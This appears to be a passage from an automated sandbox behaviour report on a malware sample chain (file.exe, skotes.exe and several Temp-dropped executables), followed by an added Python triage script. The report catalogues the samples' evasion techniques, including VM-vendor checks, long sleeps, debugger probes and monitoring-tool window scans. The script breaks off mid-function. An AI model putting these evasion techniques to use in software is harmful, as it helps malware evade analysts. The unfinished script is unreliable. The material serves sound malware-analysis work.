Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep time: -78039s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep time: -112056s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep count: 54 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep time: -108054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7892 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7908 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7984 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7904 Thread sleep time: -46023s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7992 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7896 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7916 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7900 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7204 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe TID: 4564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe TID: 5264 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 11_2_006DDBBE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E68EE FindFirstFileW,FindClose, 11_2_006E68EE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 11_2_006E698F
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_006DD076
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_006DD3A9
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_006E9642
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_006E979D
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 11_2_006E9B2B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E5C97 FindFirstFileW,FindNextFileW,FindClose, 11_2_006E5C97
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_006742DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477
Source: file.exe, 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1643474943.0000000000BD3000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000001.00000000.1677483084.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000000.1687648454.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2308286880.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, 37df924488.exe, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp, ae5cfd188c.exe, ae5cfd188c.exe, 0000000A.00000002.2809286945.0000000000487000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_^
Source: ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWrs
Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%Sat
Source: 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarea
Source: 37df924488.exe, 00000009.00000002.2578174288.00000000014B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[
Source: file.exe, 00000000.00000003.1679173652.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:I
Source: firefox.exe, 0000001A.00000002.2790332131.000001B8C5500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9-%SystemRoot%\system32\wshbth.dllHyper-V RAW
Source: 2ada66c192.exe, 0000001E.00000002.2918205303.0000000001768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%
Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001484000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2811951266.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2692799251.0000000001092000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2690178414.000000000108D000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2693268456.00000000010B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 00000018.00000002.2795803239.000002BA555C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2788989951.000001B8C541D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYQ
Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareeA
Source: file.exe, 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1643474943.0000000000BD3000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000001.00000000.1677483084.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000000.1687648454.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2308286880.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp, ae5cfd188c.exe, 0000000A.00000002.2809286945.0000000000487000.00000040.00000001.01000000.00000009.sdmp, 37df924488.exe, 0000001B.00000002.2761291474.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: firefox.exe, 0000001A.00000002.2782423918.000001B8C4F1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: firefox.exe, 0000001A.00000002.2790332131.000001B8C5500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 2ada66c192.exe, 0000001E.00000002.2918205303.0000000001768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW#
Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$
Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5U
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04CC07D4 rdtsc 0_2_04CC07D4
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006EEAA2 BlockInput, 11_2_006EEAA2
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_006A2622
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_006742DE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1652B mov eax, dword ptr fs:[00000030h] 0_2_00A1652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1A302 mov eax, dword ptr fs:[00000030h] 0_2_00A1A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00ADA302 mov eax, dword ptr fs:[00000030h] 1_2_00ADA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AD652B mov eax, dword ptr fs:[00000030h] 1_2_00AD652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00ADA302 mov eax, dword ptr fs:[00000030h] 2_2_00ADA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AD652B mov eax, dword ptr fs:[00000030h] 2_2_00AD652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ADA302 mov eax, dword ptr fs:[00000030h] 6_2_00ADA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AD652B mov eax, dword ptr fs:[00000030h] 6_2_00AD652B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00694CE8 mov eax, dword ptr fs:[00000030h] 11_2_00694CE8
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 11_2_006D0B62
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_006A2622
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0069083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0069083F
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006909D5 SetUnhandledExceptionFilter, 11_2_006909D5
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00690C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00690C21
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Memory protected: page guard Jump to behavior
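
The sandbox-detection findings above (rdtsc interceptors, self-modifying code, long sleeps, the Win32_BIOS WMI query, BIOS-version registry reads, VM vendor strings) and the Anti Debugging findings (HideFromDebugger, DebugPort queries, fs:[30h] PEB reads, IsDebuggerPresent, the SoftICE and Sysinternals probes) are easier to triage per process than as a flat list. The script below is an added example, not part of this report and not Joe Sandbox code: it parses plain-text lines in the report's own "Source: <process> <finding>" format, tags each with a technique label and summarises per process. The sample lines are shortened copies of lines from this section, the ATT&CK IDs are this example's suggested mapping rather than the report's, and one caveat is built in: "Hyper-V RAW" is the Winsock catalog name of the Hyper-V socket provider (the mswsock.dll entries visible in firefox.exe above), so it is present in any process that initialised Winsock and is recorded but not counted as a VM check.

```python
"""Evasion-technique triage over Joe Sandbox-style behaviour lines.

Added example, not part of the original report and not Joe Sandbox code.
ATT&CK IDs are this example's suggested mapping; sample lines are
shortened copies of lines from the report.
"""
import re
from collections import defaultdict

# Constructed sample input: shortened copies of report lines (same format as the report).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C708BC second address: 4C708C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CAF6B5 instructions caused by: Self-modifying code",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664 Thread sleep time: -9750000s >= -30000s Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1652B mov eax, dword ptr fs:[00000030h] 0_2_00A1652B",
    r"Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_006A2622",
    r"Source: file.exe, 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
    r"Source: firefox.exe, 0000001A.00000002.2790332131.000001B8C5500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    "Source: Yara match File source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR",
    "barindex",
]

# (label, pattern over the finding text, ATT&CK technique ID or None).
# "Hyper-V RAW" is the Winsock catalog name of the Hyper-V socket provider (mswsock.dll);
# any process that initialised Winsock carries it, so it gets no technique ID.
RULES = [
    ("rdtsc timing check", re.compile(r"RDTSC instruction interceptor|\brdtsc\b"), "T1497.003"),
    ("self-modifying code", re.compile(r"caused by: Self-modifying code"), "T1027"),
    ("long sleep / delay", re.compile(r"Thread sleep time: -\d+s|Thread delayed: delay time: \d+"), "T1497.003"),
    ("WMI BIOS query", re.compile(r"WMI Queries: .*Win32_BIOS"), "T1047"),
    ("VM-artifact registry read", re.compile(r"Registry key queried: .*(BiosVersion|DriverDesc)"), "T1497.001"),
    ("analysis-tool window scan", re.compile(r"Open window title or class name: "), "T1518.001"),
    ("SoftICE driver probe", re.compile(r"File opened: (NTICE|SICE|SIWVID)$"), "T1622"),
    ("ThreadHideFromDebugger", re.compile(r"Thread information set: HideFromDebugger"), "T1622"),
    ("ProcessDebugPort query", re.compile(r"Process queried: DebugPort"), "T1622"),
    ("PEB read via fs:[30h]", re.compile(r"fs:\[00000030h\]"), "T1622"),
    ("IsDebuggerPresent call", re.compile(r"\bIsDebuggerPresent\b"), "T1622"),
    ("VM vendor string in memory", re.compile(r"Binary or memory string: .*(VMware|VBOX|QEMU|VIRTUAL)"), "T1497.001"),
    ("Hyper-V RAW (Winsock catalog, benign)", re.compile(r"Binary or memory string: .*Hyper-V RAW"), None),
]
DELAY_RE = re.compile(r"Thread sleep time: -(\d+)s|Thread delayed: delay time: (\d+)")
MEMSTR = " Binary or memory string: "
SOURCE_RE = re.compile(r"^(?P<src>.+?\.exe) (?P<finding>.+)$")


def parse_line(line):
    """Return ([process basenames], finding text) or None for a non-behaviour line."""
    line = re.sub(r" Jump to behavior$", "", line.strip())  # drop the report's link text
    if not line.startswith("Source: "):
        return None
    body = line[len("Source: "):]
    if MEMSTR in body:
        # Memory-string findings list several dumps; attribute them to every named process.
        sources, finding = body.split(MEMSTR, 1)
        procs = sorted({t.strip() for t in sources.split(",") if t.strip().endswith(".exe")})
        return procs, MEMSTR.strip() + " " + finding
    m = SOURCE_RE.match(body)
    if not m or ": " in m["src"]:  # e.g. "Yara match File source: ..." is not a process path
        return None
    return [m["src"].rsplit("\\", 1)[-1]], m["finding"]


def summarise(lines):
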